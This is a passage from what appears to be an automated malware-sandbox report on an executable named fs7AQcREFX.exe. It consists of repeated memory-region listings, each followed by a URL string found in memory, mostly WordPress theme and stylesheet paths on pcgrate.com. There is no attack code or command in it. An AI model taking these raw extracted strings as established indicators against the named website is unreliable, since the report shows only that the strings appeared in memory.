00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/compatibility/elementor/elementor-global.min.cs
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/main.min.css?ver=9.12.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/FontAwesome/css/all.min.css?ver=9.12.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/icomoon-the7-font/icomoon-the7-font.min.css?v
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/above-the-fold.min.js?ver=9.12.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/compatibility/woocommerce/woocommerce.min.js?ver
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.css?ver=9
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.js?ver=9.
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/jquery-mousewheel/jquery-mousewheel.min.js?ver=
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/style.css?ver=9.12.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1664959878
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=1684171764
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 